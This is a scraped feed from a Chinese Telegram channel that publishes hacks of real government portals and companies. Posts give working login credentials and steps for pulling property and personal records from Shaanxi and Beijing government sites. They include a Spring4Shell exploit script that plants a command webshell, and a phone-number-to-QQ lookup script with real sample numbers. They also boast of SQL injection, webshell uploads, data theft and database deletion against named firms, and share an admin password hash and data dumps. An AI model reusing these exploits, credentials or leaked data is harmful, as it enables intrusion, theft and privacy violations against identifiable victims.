BYSGS会所---网站漏洞公布
15.3K subscribers
26 photos
4 files
14 links
频道主: @KHCHADANG
双向机器人: @SHANGGANSHEN_bot
我的接口频道: https://t.me/BYJIEKOSHEN
我的数据频道: https://t.me/SGSSHUJUKU
我的技术频道: https://t.me/HackerCCTV
我的倾诉频道: https://t.me/SGSYYDSNB
我的倾诉群聊: https://t.me/NNSGSYYDS
记住我的名字就好 我是个极度厌世的人
Download Telegram
和江苏一样的 陕西

浏览器打开:
http://1.85.55.147:8017/sxjyjx/gotologin

账号: 360782001
密码: Xuhao0924@
(怕你们是废物没有账号替换ID)
登录抓ID: sfw12a87f4aw8941fgw8a4ggaw89

然后回到主页 选择注册 单位注册 只输入统一信用社代码 其他的不要输入 输入统一信用社代码以后出单位账号 然后在输入密码 然后重新登录 账号就是信用社代码

登录以后选择
就业见习人员管理 然后选择
就业见习人员申请
然后随便弄一个 好了以后刷新网页
如果刷新没有用 就退出重新登录 继续

然后点 就业见习人员补贴申请 出公司所有
8
陕西全省不动产
陕西政务网-登录-跳到咸阳搜权利人-权利人查询-点击跳到咸阳不动产服务平台-选择区域-选择跳转区域-回到政务-回到市-切换市区-点击查询

账号:321322200409245414
密码:Xuhao0924.
3👌2
北京政务
京通注册 开抓包获取人脸前面的一个包 很容易找到就三个包
前面的包获取 ck
北京政务 登录 替换ck 刷新网页提示图片上面的
(有可能替换不了)
提示:
您将访问的业务需要更多身份信息。请使用“京通”小程序扫描下面的二维码完成更高级别的身份认证。
—————————————————-
https://bdc.ghzrzyw.beijing.gov.cn/eo/wizard/mainMenu.go
打开这个链接 选择用户中心
选择 一证通登录 如果是图片 国家政务这样子就登录成功了 刷新网页就行了 但是局限性很大 查个不动产可以
查:
不动产抵押登记
宅基地使用权及房屋所有权首次登记|
网上办理
6🤔1
漏洞名称:Spring Framework 远程代码执行漏洞(Spring4Shell)
漏洞编号:CVE-2022-22965
危害等级:高危(CVSS 9.8)blog.csdn
漏洞类型:远程代码执行(RCE)
核心原因:在 JDK 9+ 环境下,Spring MVC 的参数绑定机制允许通过 class.module.classLoader 绕过旧补丁(CVE-2010-1622),导致攻击者可修改 Tomcat 的 AccessLogValve 属性,写入恶意 JSP 文件(WebShell)
受影响版本:
组件 受影响版本范围 安全版本
Spring Framework 5.3.0–5.3.17, 5.2.0–5.2.19 ≥5.3.18, ≥5.2.20
Spring Boot 衍生框架(如 2.6.6 以下版本)≥2.6.6
利用条件(需同时满足):
1.JDK 版本 ≥ 9(因 class.module 是 JDK 9+ 引入)juejin
2.使用 Apache Tomcat 作为 Servlet 容器
3.应用以 WAR 包方式部署(非 JAR)nics.nat.gov
4.依赖 spring-webmvc 或 spring-webflux

发送以下请求,若返回 HTTP 400 错误,可能存在漏洞:
curl -v "http://target:port/path?class.module.classLoader.URLs%5B0%5D=0"

原理:Spring 解析 classLoader.URLs[0]=0 时因类型不匹配(URL 数组无法赋值 0)抛出异常

以下代码来自开源项目
import requests

target_url = "http://target:port/helloworld/greeting"
payload_path = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

# 发送payload
response = requests.get(target_url + payload_path)
if response.status_code == 200:
print("[+] 漏洞可能存在!访问 WebShell:http://target:port/tomcatwar.jsp?pwd=j&cmd=whoami")
else:
print("[-] 未检测到漏洞")

功能:自动发送 Payload 并写入 WebShell(路径:/tomcatwar.jsp),密码 pwd=j

访问 WebShell 执行命令:
curl "http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=whoami"

成功则返回服务器用户信息(如 root)
14
qf.zip
7.2 KB
概率Q反(需要root)——全自动手机号跑搜索框
烨筱and伤肝肾
@love_so_yexiao)and(@KHCHADANG

解压密码 https://t.me/yexiao_love_you


脚本原理:Tim(轻量版QQ),批量手机号反QQ账号头像URL进行对比,因为是屏幕脚本所以需要root用户使用该脚本。
请使用Termux 安装相关的库 和 tsu,不懂的可以去问群里大牛

测试效果↓
17324958813 - http://thirdqq.qlogo.cn/g?b=oidb&k=4H0jEFqX9hJrD1FxvxVXQA&kti=aQm0VQwB4hA&s=40
15322509015 - http://thirdqq.qlogo.cn/g?b=oidb&k=o11FCyCnLqOEd1IDygg2AQ&kti=aQm03wwB4hA&s=40
15090536410 - http://thirdqq.qlogo.cn/g?b=oidb&k=5dJzT4bhyqNIPBibZHJqJUA&kti=aQm06AwB4hI&s=40


注:里面的对比脚本要用电脑安装opencv,arm安卓不支持opencv
termux运行主程序
mt管理器root运行配套sh

使用tim的搜索框部分实现
如果用不了就去自己抓xy坐标自己填到脚本里面
开发者模式开触摸坐标显示,长按查看上面显示的xy
脚本里面第一个坐标是搜索框的最右侧(不是清除,一定要靠右),第二个坐标是手机输入法的回车键

运行主程序py之前一定要给tim打开,自己随便搜一个手机号之后再点击一遍那个输入框

唯一留言:叮当猫管理员是我的吹牛资本,诈骗和装逼也是我的最强手段,我的所有能力来源别人的想象力,我的人脉全来自我的吹牛逼技术,得到很多人的好感度,我的一句话就能让我的人脉害死你全家,我的一句话就能让别人给我全国头接口玩,我喜欢拿着别人的全国头泛滥,然后栽赃陷害给别人,说是别人想要泛滥自己才泛滥,我喜欢装大佬,跟别人说Q反的方向是我给的,我脑电波意淫出来的邮箱Q反就是我的压箱底接口,这辈子不会泛滥,你以为我是接口神?错了,我接口都是巴结别人的!你以为我是逆向解密大牛?错了,我是巴结别人给我解密的!我的组织连几个卖号的都能进去,这就是我组织的魅力,没有指名道姓说谁,不要在评论区破防对号入座,希望改正好自己虚伪的性格,并不是对某组织所有人存在恶意,大部分人存在一定的实力,只是对某人的人品做单方面评价

没有指名道姓说谁哦~ 急=输

请不要指点江山 虽然这个Q反含金量再怎么低 我们也承认只是个概率Q反 但请不要因此说垃圾或没用 经典之:拿破仑发现新大陆回来之后名声大噪,但是很多人都在偷偷议论说只要有人一直开船向那个方向开,谁都可以发现新大陆。有一次拿破仑知道他们议论的事之后,跟周围的人说:“你们谁能将一个鸡蛋立在桌子上面而不动?”周围的人都没有动,静静看着拿破仑表演。拿破仑拿起鸡蛋砸的凹进去了一点,鸡蛋果然立在桌子上不动了。众人嘲笑道:“这有什么好炫耀的,人人都知道的道理罢了。”拿破仑说:“本身就没什么好炫耀的,可是先生们,女士们,你们怎么没想过用到这个方法呢?难道真的是因为你们想到了只是懒得动吗?”
5
今日分享:黑龙江省公安厅
等级:高危

这里我们选择个人登录,只有登陆后才能更好的去测试

进入后发现系统维护中,这里我们使用 F12,查看源码,把系统维护中的遮罩删除

删除后我们发现可以正常使用了,这里我们选择进入进度查询 (一般来说我们挖掘后台洞都会选择 查询 预约 申报 个人信息这些功能点)

这里我们查看Js源码 发现存在一个/api/hljga-serv/projectApplyDelivery

这里我们抓包进行访问

成功拿到获取敏感数据上千条

@Yuhui_ddos
14😍1
BYSGS会所---网站漏洞公布
qf.zip
留言内涵的不是蛤蟆,而是其他人😪,不要乱套
Please open Telegram to view this post
VIEW IN TELEGRAM
今日分享:森玛克精工科技(江苏)有限公司
链接: http://www.semirke.com/about.php?id=1
等级:SQL注入 -> Getshell
首先在对目标进行信息收集时,发现其官网一处 about.php 参数存在sql注入漏洞。通过sqlmap进行探测,确认了时间盲注和联合查询注入的存在,并成功获取数据库 adm82571079_db 的权限。
深入数据库后发现,其中存放着公司最核心的业务数据。这里共计拿到该公司的一些技术数据,包括各类减速机、电机的核心设计图纸、技术参数、物料清单(BOM表)。此外,还获取了国内客户的详细联系方式、历年销售合同及定价策略,以及国内供应商名单。

接着,为进一步窃取服务器上的文件资料,我们利用SQL注入的 INTO OUTFILE 功能,在读取网站配置文件获取到物理路径后,成功写入webshell,控制了服务器

这里成功进入内网了,后续在进行内部资料寻找,把中心放在研发和财务部门的文件服务器中,不过都是支出流水和一些工作报告,没什么用

目前把sql数据库的东西全删了,网站还能访问,欢迎各位大牛访问。😄

ps:图片默认保存的路径找不到了,只能纯文本了QAQ

@Yuhui_ddos thank you~
4
今日渗透分享:北京京瀚禹电子工程技术有限公司SQL注入
目标:北京京瀚禹电子工程技术有限公司 ( jhyjczx.com )
技术栈:PHP 5.2.17, Apache, MySQL 5.0.12
在对目标进行信息收集中,发现 about.php?cid=1&id=2 这个URL存在注入风险。
直接上sqlmap,扫描结果非常给力:
一个时间盲注、一个布尔盲注、一个联合注入,UNION查询的存在,基本可以判断无WAF,直接开始脱库。
数据获取:
成功获取数据库 bdm10851955_db,其中 admin 表引起了我们的注意:
Database: bdm10851955_db
Table: admin
[1 entry]
+--------------+----------------------------------+
| aname | apass |
+--------------+----------------------------------+
| jhywzhht2511 | 122c79b410c885197c565617a1066142 |
+--------------+----------------------------------+
密码是MD5加密,没去暴力破解,感兴趣的可以自己试试
总结
一个严重的SQL注入,直接导致后台失守。本来后面还有一个竞争条件可以拿shell,但懒得搞了,我要去玩明日方舟终末地!!!
作者: @Yuhui_ddos
来源:
@Yuhui_net
4
jhyjczx.com.zip
105 KB
jhyjczx.com 此站脱库数据
支付宝苹果免密漏洞.pdf
10.9 MB
一名Java 后端开发工程师,同时也是电信诈骗受害者,披露了一起涉及 “苹果 + 支付宝免密支付授权” 的严重安全问题。
受害者在完全不知情的情况下,仅一次 0.1 元操作,就被连续盗刷 999 元两笔。

@Yuhui_ddos 👏👏👏
🤯133
目标链接:http://eflybird.com/products_list.php?nid=19
技术栈:PHP 5.2.17, Apache,MySQL >= 5.0.12
在对目标进行信息收集中,发现 http://eflybird.com/products_list.php?nid=19 这个URL存在注入风险,毕竟依赖后端嘛wwww
sqlmap一扫果然有货(依旧御三家,我是不是不应该再玩sql注入了?换一个别的玩玩?)一个一个布尔盲注、一个联合注入,因为联合查询的存在,基本可以判断无WAF,直接开始脱库(本次只脱了一部分)
成功获取数据库,叫bdm252107493_db
其中的user十分肥美啊!(篇幅限制原因这里不展示,自行查看压缩包)
密码还是MD5加密,暴力破解燃尽了,rockyou没出,许愿有人为我破解
总结:很典的sql注入,不过多解释了。对了我就是个渗透兴趣爱好者,我玩玩这种小站就好~
作者: @Yuhui_ddos
6